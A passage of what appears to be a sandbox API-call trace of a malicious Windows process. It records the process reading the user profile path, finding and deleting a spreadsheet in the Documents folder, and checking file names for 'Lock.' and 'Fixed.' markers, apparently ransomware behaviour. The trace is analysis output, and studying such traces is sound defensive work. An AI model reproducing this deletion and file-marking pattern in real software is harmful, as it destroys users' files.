lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f2068 [0262.646] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/goQ5n58_cIUllMnUx.xlsx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx", lpFilePart=0x8bedfc*="goQ5n58_cIUllMnUx.xlsx") returned 0x3e [0262.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.646] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\goq5n58_ciullmnux.xlsx")) returned 0x20 [0262.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200939b0, ftCreationTime.dwHighDateTime=0x1d4a571, ftLastAccessTime.dwLowDateTime=0x6ef507e0, ftLastAccessTime.dwHighDateTime=0x1d4c720, ftLastWriteTime.dwLowDateTime=0x6ef507e0, ftLastWriteTime.dwHighDateTime=0x1d4c720, nFileSizeHigh=0x0, nFileSizeLow=0x9e84, dwReserved0=0x1bb2, dwReserved1=0x4, cFileName="goQ5n58_cIUllMnUx.xlsx", cAlternateFileName="GOQ5N5~1.XLS")) returned 0xaa59a0 [0262.646] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\goq5n58_ciullmnux.xlsx")) returned 1 [0262.648] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x200939b0, ftCreationTime.dwHighDateTime=0x1d4a571, ftLastAccessTime.dwLowDateTime=0x6ef507e0, ftLastAccessTime.dwHighDateTime=0x1d4c720, ftLastWriteTime.dwLowDateTime=0x6ef507e0, ftLastWriteTime.dwHighDateTime=0x1d4c720, nFileSizeHigh=0x0, nFileSizeLow=0x9e84, dwReserved0=0x1bb2, dwReserved1=0x4, cFileName="goQ5n58_cIUllMnUx.xlsx", cAlternateFileName="GOQ5N5~1.XLS")) returned 0 [0262.648] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0262.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.648] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0262.649] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0262.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.649] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7e) returned 0x24f2068 [0262.652] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/goQ5n58_cIUllMnUx.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx", lpFilePart=0x8bf658*="goQ5n58_cIUllMnUx.xlsx") returned 0x3e [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.652] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\goQ5n58_cIUllMnUx.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\goq5n58_ciullmnux.xlsx")) returned 0xffffffff [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.652] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0262.652] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.652] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icIcTV1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cIcTV1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IcTV1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cTV1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TV1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1 eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eT9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ro.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0262.654] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0262.654] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0262.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c) returned 0x24b3538 [0262.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0262.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icIcTV1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cIcTV1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IcTV1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cTV1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TV1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1 eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eT9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ro.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3618 [0262.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3618 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.657] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0262.657] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0262.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.658] RtlAllocateHeap (HeapHandle=0x25c0000, 